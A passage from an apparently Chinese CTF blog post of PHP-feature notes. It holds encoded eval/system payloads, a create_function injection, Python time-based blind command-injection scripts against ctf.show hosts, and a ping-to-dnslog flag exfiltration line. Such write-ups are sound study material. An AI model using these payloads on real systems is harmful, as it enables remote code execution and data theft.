class="line">#?code=(&quot;%08%02%08%09%05%0d&quot;^&quot;%7b%7b%7b%7d%60%60&quot;)(&quot;%0c%08&quot;^&quot;%60%7b&quot;);</span><br></pre></td></tr></table></figure>

<h2 id="44"><a href="#44" class="headerlink" title="44."></a>44.</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">if(isset($_POST[&#x27;ctf&#x27;]))&#123;</span><br><span class="line">    $ctfshow = $_POST[&#x27;ctf&#x27;];</span><br><span class="line">    if(!preg_match(&#x27;/^[a-z0-9_]*$/isD&#x27;,$ctfshow)) &#123;</span><br><span class="line">        $ctfshow(&#x27;&#x27;,$_GET[&#x27;show&#x27;]);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里先闭合前面的 { ，再注释后面的 }，可绕过滤</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?show=&#125;system(&#x27;ls&#x27;);//</span><br><span class="line">ctf=\create_function</span><br></pre></td></tr></table></figure>

<h2 id="45-eval-“return-v1-v3-v2-”-过滤加减、取反、或，我们可以使用乘除号代替加减号，取反、或不能使用我们还可以采用异或运算构造-payload。"><a href="#45-eval-“return-v1-v3-v2-”-过滤加减、取反、或，我们可以使用乘除号代替加减号，取反、或不能使用我们还可以采用异或运算构造-payload。" class="headerlink" title="45.&#96;eval(“return $v1$v3$v2;”);过滤加减、取反、或，我们可以使用乘除号代替加减号，取反、或不能使用我们还可以采用异或运算构造 payload。"></a>45.&#96;eval(“return $v1$v3$v2;”);过滤加减、<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=%E5%8F%96%E5%8F%8D&spm=1001.2101.3001.7020">取反</a>、或，我们可以使用乘除号代替加减号，取反、或不能使用我们还可以采用异或运算构造 payload。</h2><p>利用上诉代码构造payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?v1=1&amp;v2=1&amp;v3=*(&quot;%0c%06%0c%0b%05%0d&quot;^&quot;%7f%7f%7f%7f%60%60&quot;)(&quot;%0c%0c&quot;^&quot;%60%7f&quot;)*</span><br></pre></td></tr></table></figure>

<h2 id="46-过滤异或、冒号"><a href="#46-过滤异或、冒号" class="headerlink" title="46.过滤异或、冒号"></a>46.过滤异或、冒号</h2><p>我们采用或、取反都可以，加减乘除都被过滤，可以用位或运算符 |。或者&#x3D;&#x3D;*|</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?v1=1&amp;v2=1&amp;v3=|(~%8C%86%8C%8B%9A%92)(~%8B%9E%9C%DF%99%93%9E%98%D1%8F%97%8F)|</span><br></pre></td></tr></table></figure>

<p> 也可以用三元运算符：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?v1=1&amp;v2=1&amp;v3=?(~%8C%86%8C%8B%9A%92)(~%8B%9E%9C%DF%99%93%9E%98%D1%8F%97%8F):</span><br></pre></td></tr></table></figure>

<h2 id="47-code-eval-“return-f1-f2-”"><a href="#47-code-eval-“return-f1-f2-”" class="headerlink" title="47.$code &#x3D; eval(“return $f1($f2());”);"></a>47.$code &#x3D; eval(“return $f1($f2());”);</h2><p>让intval($code)为0：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">md5(phpinfo())</span><br><span class="line">md5(sleep())</span><br><span class="line">md5(md5())</span><br><span class="line">current(localeconv)</span><br><span class="line">sha1(getcwd())     因为/var/www/html md5后开头的数字所以我们改用sha1</span><br></pre></td></tr></table></figure>

<h2 id="web139-盲注文件名及flag"><a href="#web139-盲注文件名及flag" class="headerlink" title="web139.盲注文件名及flag:"></a>web139.盲注文件名及flag:</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">import string</span><br><span class="line"></span><br><span class="line">str = string.ascii_letters + string.digits + &quot;-&quot; + &quot;&#123;&quot; + &quot;&#125;&quot; + &quot;_&quot; + &quot;~&quot;    # 构建一个包含所有字母和数字以及部分符号的字符串，符号可以自己加</span><br><span class="line">result = &quot;&quot;          # 初始化一个空字符串，用于保存结果</span><br><span class="line"></span><br><span class="line">#获取多少行</span><br><span class="line">for i in range(1, 99):</span><br><span class="line">    key = 0   #用于控制内层循环(j)的结束</span><br><span class="line"></span><br><span class="line">    #不break的情况下，一行最多几个字符</span><br><span class="line">    for j in range(1, 99):</span><br><span class="line">        if key == 1:</span><br><span class="line">            break</span><br><span class="line">        for n in str:       #n就是一个一个的返回值</span><br><span class="line">            payload = &quot;if [ `ls /|awk &#x27;NR==&#123;0&#125;&#x27;|cut -c &#123;1&#125;` == &#123;2&#125; ];then sleep 3;fi&quot;.format(i, j, n)   #&#123;n&#125;是占位符</span><br><span class="line">            #print(payload)</span><br><span class="line">            url = &quot;http://89e3e82d-d133-4a9e-a883-790d41e8a3b8.challenge.ctf.show?c=&quot; + payload</span><br><span class="line">            try:</span><br><span class="line">                requests.get(url, timeout=(2.5, 2.5))   #设置超时时间为 2.5 秒,包括连接超时和读取超时，超时就是之前sleep 3了。</span><br><span class="line"></span><br><span class="line">            # 如果请求发生异常，表示条件满足，将当前字符 n 添加到结果字符串中，并结束当前内层循环</span><br><span class="line">            except:</span><br><span class="line">                result = result + n</span><br><span class="line">                print(result)</span><br><span class="line">                break</span><br><span class="line">            if n == &#x27;~&#x27;:    #str的最后一位，“~”不常出现，用作结尾</span><br><span class="line">                key = 1</span><br><span class="line">    # 在每次获取一个字符后，将一个空格添加到结果字符串中，用于分隔结果的不同位置</span><br><span class="line">    result += &quot; &quot;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">import string</span><br><span class="line"></span><br><span class="line">str = string.digits + string.ascii_lowercase + &quot;-&quot; + &quot;_&quot; + &quot;~&quot;# 题目过滤花括号，这里就不加了</span><br><span class="line">result = &quot;&quot;</span><br><span class="line">for j in range(1, 99):</span><br><span class="line">    for n in str:</span><br><span class="line">        payload = &quot;if [ `cat /f149_15_h3r3 |cut -c &#123;0&#125;` == &#123;1&#125; ];then sleep 3;fi&quot;.format(j, n)</span><br><span class="line">        # print(payload)</span><br><span class="line">        url = &quot;http://89e3e82d-d133-4a9e-a883-790d41e8a3b8.challenge.ctf.show?c=&quot; + payload</span><br><span class="line">        try:</span><br><span class="line">            requests.get(url, timeout=(2.5, 2.5))</span><br><span class="line">        except:</span><br><span class="line">            result = result + n</span><br><span class="line">            print(result)</span><br><span class="line">            break</span><br><span class="line">        if n==&quot;~&quot;:</span><br><span class="line">            result = result + &quot;花括号&quot;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="web133-限制六个字符eval-substr-F-0-6"><a href="#web133-限制六个字符eval-substr-F-0-6" class="headerlink" title="web133.限制六个字符eval(substr($F,0,6))"></a>web133.限制六个字符eval(substr($F,0,6))</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?F=`$F`; ping `cat flag.php | grep ctfshow | tr -cd &#x27;[a-z]&#x27;/&#x27;[0-9]&#x27;`.dnslog得到的网址 -c 1</span><br></pre></td></tr></table></figure>

<h2 id="web135-限制六个字符，进行相应过滤："><a href="#web135-限制六个字符，进行相应过滤：" class="headerlink" title="web135.限制六个字符，进行相应过滤："></a>web135.限制六个字符，进行相应过滤：</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">?F=`$F` ;cp flag.php x.txt</span><br><span class="line">?F=`$F` ;nl flag.php&gt;x.txt</span><br><span class="line">?F=`$F` ;mv flag.php x.txt</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="web136-exec相当于system"><a href="#web136-exec相当于system" class="headerlink" title="web136.exec相当于system"></a>web136.<strong>exec相当于system</strong></h2><p>tee命令主要用于从标准输入读取数据，并将其内容同时输出到标准输出（屏幕）和一个或多个文件中。简单来说，就像水管中的 T 形接头一样，数据流经过这里时，既可以继续流向下游，也可以分流保存到指定的文件中。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=cat /f149_15_h3r3|tee 6</span><br></pre></td></tr></table></figure>

<h2 id="Basectf-flag直接读取不就行了？"><a href="#Basectf-flag直接读取不就行了？" class="headerlink" title="Basectf  flag直接读取不就行了？"></a>Basectf  flag直接读取不就行了？</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(&#x27;index.php&#x27;);</span><br><span class="line"># 我把flag藏在一个secret文件夹里面了，所以要学会遍历啊~</span><br><span class="line">error_reporting(0);</span><br><span class="line">$J1ng = $_POST[&#x27;J&#x27;];</span><br><span class="line">$Hong = $_POST[&#x27;H&#x27;];</span><br><span class="line">$Keng = $_GET[&#x27;K&#x27;];</span><br><span class="line">$Wang = $_GET[&#x27;W&#x27;];</span><br><span class="line">$dir = new $Keng($Wang);</span><br><span class="line">foreach($dir as $f) &#123;</span><br><span class="line">    echo($f . &#x27;&lt;br&gt;&#x27;);</span><br><span class="line">&#125;</span><br><span class="line">echo new $J1ng($Hong);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>1.由<code>$dir = new $Keng($Wang);</code>可知要先进行一次遍历：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?K=DirectoryIterator&amp;W=/secret/</span><br></pre></td></tr></table></figure>

<p>2.然后找到flag在&#x2F;secret文件夹的f11444g.php</p>
<p>3.然后用伪协议读取内容：</p>
<p><code>echo new $J1ng($Hong);</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">POST：J=SplFileObject&amp;H=php://filter/read=convert.base64-encode/resource=/secret/f11444g.php</span><br></pre></td></tr></table></figure>

<p><mark><code>SPLFileObject</code>是PHP SPL库中的一个类，它封装了对文件资源的访问。它提供了一个面向对象的方式来操作文件，支持随机访问、二进制模式、流式读取和写入等多种操作模式。</mark></p>
</article><!-- lincense--><div class="license-wrapper"><p> <span>Author:  </span><a href="http://1768161086.github,io">userq</a></p><p> <span>Link:  </span><a href="http://1768161086.github,io/2025/01/25/php%E7%89%B9%E6%80%A7/">http://1768161086.github,io/2025/01/25/php%E7%89%B9%E6%80%A7/</a></p><p> <span>Copyright:  </span><span>All articles in this blog are licensed under <a rel="license noopener" target="_blank" href="https://creativecommons.org/licenses/by-nc-nd/3.0">CC BY-NC-SA 3.0</a> unless stating additionally.</span></p></div><div class="post-paginator"><a class="prevSlogan" href="/2025/01/27/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" title="文件上传"><span>< PreviousPost</span><br><span class="prevTitle">文件上传</span></a><a class="nextSlogan" href="/2025/01/22/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" title="文件包含相关知识点介绍"><span>NextPost ></span><br><span class="nextTitle">文件包含相关知识点介绍</span></a><div class="clear"></div></div><div id="comment"></div></section></article><footer id="cxo-footer-outer"><div id="cxo-footer-inner"><p class="footer-container"><span>Site by </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span> | theme </span><a target="_blank" rel="noopener" href="https://github.com/Longlongyu/hexo-theme-Cxo"><span>Cxo</span></a></p><i class="fa fa-user"> </i><span id="busuanzi_value_site_uv"></span><span> | </span><i class="fa fa-eye"> </i><span id="busuanzi_value_site_pv"></span></div></footer><!-- catelog--><div class="toc-wrapper" style="top: 70vh;"><div class="toc-catalog"><i class="fa fa-list"> </i><span>CATALOG</span></div><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-intval-%E5%87%BD%E6%95%B0%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">1.intval() 函数：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%EF%BC%81strpos-num-%E2%80%9C0%E2%80%9D-%EF%BC%9A"><span class="toc-number">2.</span> <span class="toc-text">2.！strpos($num, “0”)：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-in-array-%E5%87%BD%E6%95%B0%EF%BC%9A"><span class="toc-number">3.</span> <span class="toc-text">3.in_array() 函数：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-php%E8%BF%90%E7%AE%97%E7%AC%A6%E4%BC%98%E5%85%88%E7%BA%A7%EF%BC%9A"><span class="toc-number">4.</span> <span class="toc-text">4.php运算符优先级：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-substr-string-start-length-%E5%87%BD%E6%95%B0%EF%BC%9A"><span class="toc-number">5.</span> <span class="toc-text">5.substr(string,start,length) 函数：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-hex2bin-%EF%BC%9A"><span class="toc-number">6.</span> <span class="toc-text">6.hex2bin()：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7-call-user-func-%E5%87%BD%E6%95%B0%EF%BC%9A"><span class="toc-number">7.</span> <span class="toc-text">7.call_user_func() 函数：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#8-parse-str-string-array"><span class="toc-number">8.</span> <span class="toc-text">8.parse_str(string,array):</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#9-strrev%E5%87%BD%E6%95%B0%EF%BC%9A"><span class="toc-number">9.</span> <span class="toc-text">9.strrev函数：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#10-ereg%E5%87%BD%E6%95%B0%E5%8F%AF%E4%BB%A5%E7%94%A8-00%E6%88%AA%E6%96%AD"><span class="toc-number">10.</span> <span class="toc-text">10.ereg函数可以用%00截断</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#11-%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95-toString-%EF%BC%9A"><span class="toc-number">11.</span> <span class="toc-text">11.魔术方法 __toString() ：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#12-var-dump-%E5%87%BD%E6%95%B0%EF%BC%9A"><span class="toc-number">12.</span> <span class="toc-text">12.var_dump()函数：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#13-php-%E4%B8%AD%E6%9F%A5%E7%9C%8B%E7%9B%AE%E5%BD%95%E7%9A%84%E5%87%BD%E6%95%B0%E6%9C%89%EF%BC%9A"><span class="toc-number">13.</span> <span class="toc-text">13.php 中查看目录的函数有：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#14-php%E5%86%85%E7%BD%AE%E7%B1%BBFilesystemIterator"><span class="toc-number">14.</span> <span class="toc-text">14.php内置类FilesystemIterator</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#15-%E5%92%8C%E5%8F%8D%E5%BC%95%E5%8F%B7%E8%A2%AB%E8%BF%87%E6%BB%A4"><span class="toc-number">15.</span> <span class="toc-text">15.$ 和反引号被过滤</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#16-GLOBALS-eval-v1-v2-var-dump-v1"><span class="toc-number">16.</span> <span class="toc-text">16..$GLOBALS eval(&quot;$$v1 &#x3D; &amp;$$v2;&quot;);    var_dump($$v1);</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#17-is-file-%E5%87%BD%E6%95%B0"><span class="toc-number">17.</span> <span class="toc-text">17.is_file() 函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#18-%E8%BF%87%E6%BB%A4filter%EF%BC%9A"><span class="toc-number">18.</span> <span class="toc-text">18.过滤filter：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#19-trim%E6%98%AF%E5%87%BD%E6%95%B0%E7%A7%BB%E9%99%A4%E5%AD%97%E7%AC%A6%E4%B8%B2%E4%B8%A4%E4%BE%A7%E7%9A%84%E7%A9%BA%E7%99%BD%E5%AD%97%E7%AC%A6%E6%88%96%E5%85%B6%E4%BB%96%E9%A2%84%E5%AE%9A%E4%B9%89%E5%AD%97%E7%AC%A6%EF%BC%88-0c%E5%8F%AF%E7%BB%95%E8%BF%87%EF%BC%89"><span class="toc-number">19.</span> <span class="toc-text">19.trim是函数移除字符串两侧的空白字符或其他预定义字符（%0c可绕过）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#19-1%E8%BF%87%E6%BB%A4echo-%E5%88%A9%E7%94%A8-SERVER-argv-0-%E5%B0%B1%E5%8F%AF%E4%BB%A5%E7%BB%95%E8%BF%87%E5%AF%B9-isset-fl0g-%E7%9A%84%E5%88%A4%E6%96%AD%EF%BC%8C%E7%94%A8-%E4%BB%A3%E8%A1%A8%E7%A9%BA%E6%A0%BC"><span class="toc-number">20.</span> <span class="toc-text">19.1过滤echo:利用$_SERVER[&#39;argv&#39;][0] 就可以绕过对**isset($fl0g)**的判断，用+代表空格</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#20-%E5%9C%A8php%E4%B8%AD%E5%8F%98%E9%87%8F%E5%90%8D%E5%8F%AA%E6%9C%89%E6%95%B0%E5%AD%97%E5%AD%97%E6%AF%8D%E4%B8%8B%E5%88%92%E7%BA%BF%EF%BC%8C%E8%A2%ABget%E6%88%96%E8%80%85post%E4%BC%A0%E5%85%A5%E7%9A%84%E5%8F%98%E9%87%8F%E5%90%8D%EF%BC%8C%E5%A6%82%E6%9E%9C%E5%90%AB%E6%9C%89%E7%A9%BA%E6%A0%BC%E3%80%81-%E3%80%81-%E5%88%99%E4%BC%9A%E8%A2%AB%E8%BD%AC%E5%8C%96%E4%B8%BA-%EF%BC%8C%E6%89%80%E4%BB%A5%E6%8C%89%E7%90%86%E6%9D%A5%E8%AF%B4%E6%88%91%E4%BB%AC%E6%9E%84%E9%80%A0%E4%B8%8D%E5%87%BACTF-SHOW-COM%E8%BF%99%E4%B8%AA%E5%8F%98%E9%87%8F-%E5%9B%A0%E4%B8%BA%E5%90%AB%E6%9C%89-%EF%BC%8C%E4%BD%86php%E4%B8%AD%E6%9C%89%E4%B8%AA%E7%89%B9%E6%80%A7%E5%B0%B1%E6%98%AF%E5%A6%82%E6%9E%9C%E4%BC%A0%E5%85%A5-%EF%BC%8C%E5%AE%83%E8%A2%AB%E8%BD%AC%E5%8C%96%E4%B8%BA-%E4%B9%8B%E5%90%8E%EF%BC%8C%E5%90%8E%E9%9D%A2%E7%9A%84%E5%AD%97%E7%AC%A6%E5%B0%B1%E4%BC%9A%E8%A2%AB%E4%BF%9D%E7%95%99%E4%B8%8B%E6%9D%A5%E4%B8%8D%E4%BC%9A%E8%A2%AB%E6%9B%BF%E6%8D%A2"><span class="toc-number">21.</span> <span class="toc-text">20.在php中变量名只有数字字母下划线，被get或者post传入的变量名，如果含有空格、+、[则会被转化为_，所以按理来说我们构造不出CTF_SHOW.COM这个变量(因为含有.)，但php中有个特性就是如果传入[，它被转化为_之后，后面的字符就会被保留下来不会被替换</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#21-extract-%E5%87%BD%E6%95%B0%EF%BC%9A"><span class="toc-number">22.</span> <span class="toc-text">21.extract() 函数：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#22-var-dump-call-user-func-call-user-func-f1-f2"><span class="toc-number">23.</span> <span class="toc-text">22.var_dump(call_user_func(call_user_func($f1,$f2)));</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#23-stripos-%E5%87%BD%E6%95%B0%EF%BC%9A"><span class="toc-number">24.</span> <span class="toc-text">23.stripos() 函数：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#24-%E6%97%A2%E8%A6%81%E6%B1%82-ctfshow-%E5%89%8D%E9%9D%A2%E4%B8%8D%E8%83%BD%E6%9C%89%E5%AD%97%E7%AC%A6%EF%BC%8C%E4%BD%86%E5%8F%88%E8%A6%81%E6%B1%82%E5%BE%97%E6%89%BE%E5%88%B0%E5%AD%97%E7%AC%A6%E4%B8%B2-36Dctfshow%E3%80%82%E5%88%A9%E7%94%A8-preg-match-%E7%9A%84%E5%9B%9E%E6%BA%AF%E7%BB%95%E8%BF%87%EF%BC%8C%E5%9B%9E%E6%BA%AF%E6%AC%A1%E6%95%B0%E9%BB%98%E8%AE%A4%E4%B8%8A%E9%99%90%E6%98%AF-100-%E4%B8%87%E3%80%82"><span class="toc-number">25.</span> <span class="toc-text">24.既要求 ctfshow 前面不能有字符，但又要求得找到字符串 36Dctfshow。利用 preg_match 的回溯绕过，回溯次数默认上限是 100 万。</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#25-%E6%AD%A3%E5%88%99%E5%8C%B9%E9%85%8D"><span class="toc-number">26.</span> <span class="toc-text">25.正则匹配</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#26-parse-str-%E5%87%BD%E6%95%B0"><span class="toc-number">27.</span> <span class="toc-text">26.parse_str()函数:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#27-%E7%9C%8B%E5%88%B0shell-exec%E5%92%8Cblacklist%EF%BC%8C%E7%9F%A5%E9%81%93%E6%98%AF%E6%97%A0%E5%9B%9E%E6%98%BErce%E3%80%82"><span class="toc-number">28.</span> <span class="toc-text">27.看到shell_exec和blacklist，知道是无回显rce。</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#28-%E5%9C%A8-php-%E4%B8%AD%EF%BC%8C-%E7%94%A8%E4%BA%8E%E8%AE%BF%E9%97%AE%E7%B1%BB%E7%9A%84%E5%AE%9E%E4%BE%8B%E6%88%90%E5%91%98%EF%BC%88%E5%B1%9E%E6%80%A7%E5%92%8C%E6%96%B9%E6%B3%95%EF%BC%89%EF%BC%8C"><span class="toc-number">29.</span> <span class="toc-text">28.在 php 中，-&gt; 用于访问类的实例成员（属性和方法），</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#29-%E6%97%A0%E5%86%99%E6%9D%83%E9%99%90%EF%BC%8C%E6%97%A0%E6%B3%95%E4%BD%BF%E7%94%A8tee%E5%91%BD%E4%BB%A4%EF%BC%8C%E5%8F%AF%E7%94%A8%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8"><span class="toc-number">30.</span> <span class="toc-text">29.无写权限，无法使用tee命令，可用时间盲注</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#30-foreach-files-as-file-%E2%80%A6-%EF%BC%9A%E9%81%8D%E5%8E%86%E6%95%B0%E7%BB%84%E4%B8%AD%E7%9A%84%E6%AF%8F%E4%B8%80%E4%B8%AA%E6%96%87%E4%BB%B6%E3%80%82"><span class="toc-number">31.</span> <span class="toc-text">30.foreach($files as $file) { … }：遍历数组中的每一个文件。</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#31-php%E5%86%85%E7%9A%84%E2%80%9D-%E2%80%9C%E5%9C%A8%E5%81%9A%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E7%9A%84%E6%97%B6%E5%80%99%EF%BC%8C%E4%BC%9A%E8%AF%86%E5%88%AB%E7%89%B9%E6%AE%8A%E5%AD%97%E7%AC%A6%E4%B8%B2%EF%BC%8C%E7%BB%95%E8%BF%87%E9%BB%91%E5%90%8D%E5%8D%95%EF%BC%8C%E5%A6%82%EF%BC%9Afunc-system-p-find-name-flag"><span class="toc-number">32.</span> <span class="toc-text">31.php内的” \ “在做代码执行的时候，会识别特殊字符串，绕过黑名单，如：func&#x3D;\system&amp;p&#x3D;find &#x2F; -name flag*</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#32-session-id-%E5%8F%AF%E4%BB%A5%E7%94%A8%E6%9D%A5%E8%8E%B7%E5%8F%96-%E8%AE%BE%E7%BD%AE-%E5%BD%93%E5%89%8D%E4%BC%9A%E8%AF%9D-ID%E3%80%82-%E5%9C%A8%E6%88%91%E4%BB%AC%E4%BD%BF%E7%94%A8-session-id-%E7%9A%84%E6%97%B6%E5%80%99-%E9%9C%80%E8%A6%81%E4%BD%BF%E7%94%A8session-start-%E6%9D%A5%E5%BC%80%E5%90%AFsession%E4%BC%9A%E8%AF%9D-%E6%88%91%E4%BB%AC%E5%B0%9D%E8%AF%95%E6%9E%84%E9%80%A0payload"><span class="toc-number">33.</span> <span class="toc-text">32.session_id() 可以用来获取&#x2F;设置 当前会话 ID。 在我们使用 session_id()的时候 需要使用session_start()来开启session会话 我们尝试构造payload</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#39-fputs-%E5%87%BD%E6%95%B0%E5%B0%86%E5%86%85%E5%AE%B9%E5%86%99%E5%85%A5%E4%B8%80%E4%B8%AA%E6%89%93%E5%BC%80%E7%9A%84%E6%96%87%E4%BB%B6%E4%B8%AD%E3%80%82"><span class="toc-number">34.</span> <span class="toc-text">39.fputs() 函数将内容写入一个打开的文件中。</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#40-create-function-%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5%EF%BC%9A"><span class="toc-number">35.</span> <span class="toc-text">40.create_function()代码注入：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#41-%E8%B0%83%E7%94%A8%E7%B1%BB%E4%B8%AD%E7%9A%84%E5%87%BD%E6%95%B0%E5%8F%AF%E7%94%A8%EF%BC%9A"><span class="toc-number">36.</span> <span class="toc-text">41.调用类中的函数可用：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#42-file-put-contents-GET-ctf-POST-show"><span class="toc-number">37.</span> <span class="toc-text">42.file_put_contents($_GET[&#39;ctf&#39;], $_POST[&#39;show&#39;]);</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#43-%E8%BF%87%E6%BB%A4%E5%AD%97%E6%AF%8D%E6%95%B0%E5%AD%97%E7%AC%A6%E5%8F%B7%E6%89%A7%E8%A1%8Ceval"><span class="toc-number">38.</span> <span class="toc-text">43.过滤字母数字符号执行eval:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#44"><span class="toc-number">39.</span> <span class="toc-text">44.</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#45-eval-%E2%80%9Creturn-v1-v3-v2-%E2%80%9D-%E8%BF%87%E6%BB%A4%E5%8A%A0%E5%87%8F%E3%80%81%E5%8F%96%E5%8F%8D%E3%80%81%E6%88%96%EF%BC%8C%E6%88%91%E4%BB%AC%E5%8F%AF%E4%BB%A5%E4%BD%BF%E7%94%A8%E4%B9%98%E9%99%A4%E5%8F%B7%E4%BB%A3%E6%9B%BF%E5%8A%A0%E5%87%8F%E5%8F%B7%EF%BC%8C%E5%8F%96%E5%8F%8D%E3%80%81%E6%88%96%E4%B8%8D%E8%83%BD%E4%BD%BF%E7%94%A8%E6%88%91%E4%BB%AC%E8%BF%98%E5%8F%AF%E4%BB%A5%E9%87%87%E7%94%A8%E5%BC%82%E6%88%96%E8%BF%90%E7%AE%97%E6%9E%84%E9%80%A0-payload%E3%80%82"><span class="toc-number">40.</span> <span class="toc-text">45.&#96;eval(“return $v1$v3$v2;”);过滤加减、取反、或，我们可以使用乘除号代替加减号，取反、或不能使用我们还可以采用异或运算构造 payload。</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#46-%E8%BF%87%E6%BB%A4%E5%BC%82%E6%88%96%E3%80%81%E5%86%92%E5%8F%B7"><span class="toc-number">41.</span> <span class="toc-text">46.过滤异或、冒号</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#47-code-eval-%E2%80%9Creturn-f1-f2-%E2%80%9D"><span 